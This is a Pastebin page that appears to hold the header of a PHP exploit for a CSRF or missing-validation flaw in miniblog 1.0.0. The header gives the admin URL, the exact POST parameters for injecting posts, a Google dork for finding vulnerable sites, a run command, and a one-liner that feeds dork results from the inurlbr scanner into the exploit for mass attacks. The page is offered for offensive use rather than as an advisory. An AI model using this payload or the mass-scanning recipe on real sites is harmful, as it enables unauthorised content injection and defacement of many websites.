Googleinurl

[EXPLOIT] miniblog 1.0.0 CSRF 4ADD post / INURL BRASIL

May 2nd, 2015
1,895
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. /*
  4.   [+] Discoverer Author: Mustafa Moshkela
  5.   REF COD POC: http://www.exploit4arab.net/exploits/1482
  6.   Greets to: all members in iq-team.org
  7.   ------------------------------------------------------------------------------
  8.  
  9.   # SCRIPT by:     [ I N U R L  -  B R A S I L ] - [ By GoogleINURL ]
  10.   # EXPLOIT NAME:  XPL miniblog 1.0.0 CSRF 4ADD post / INURL BRASIL
  11.   # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  12.   # Email:         inurlbr@gmail.com
  13.   # Blog:          http://blog.inurl.com.br
  14.   # Twitter:       https://twitter.com/googleinurl
  15.   # Fanpage:       https://fb.com/InurlBrasil
  16.   # Pastebin       http://pastebin.com/u/Googleinurl
  17.   # GIT:           https://github.com/googleinurl
  18.   # PSS:           http://packetstormsecurity.com/user/googleinurl
  19.   # YOUTUBE:       http://youtube.com/c/INURLBrasil
  20.   # PLUS:          http://google.com/+INURLBrasil
  21.   ------------------------------------------------------------------------------
  22.  
  23.   # DATA SUBMISSION WITHOUT VALIDATION
  24.  
  25.   # Vendor:        http://www.spyka.net/scripts/php/miniblo
  26.  
  27.   # Google Dork:   intext:"Powered by miniblog" ext:php
  28.  
  29.   # POC:           http://{YOU_URL}/adm/admin.php?mode=add
  30.  
  31.   # SEND REQUEST POST
  32.   adddata[post_title]=TITLE&data[post_content]=<b>YOU_POST</b>&data[published]=1&miniblog_PostBack=Add
  33.   ------------------------------------------------------------------------------
  34.  
  35.   # EXECUTE:       php xpl.php -t http://target.us
  36.  
  37.   # FILE_OUTPUT :  miniblog_vuln.txt
  38.  
  39.   # EXPLOIT MASS USE SCANNER INURLBR
  40.   php inurlbr.php --dork 'intext:"Powered by miniblog" ext:php' -s output.txt --command-all 'php xpl.php -t _TARGET_'
  41.   More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR
  42.   ------------------------------------------------------------------------------
  43.  
  44.  
  45.  */
  46. ACESSO EXPLOIT CODE-->>> https://github.com/googleinurl/miniblog-1.0.0-CSRF-4ADD-post-INURL-BRASIL
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×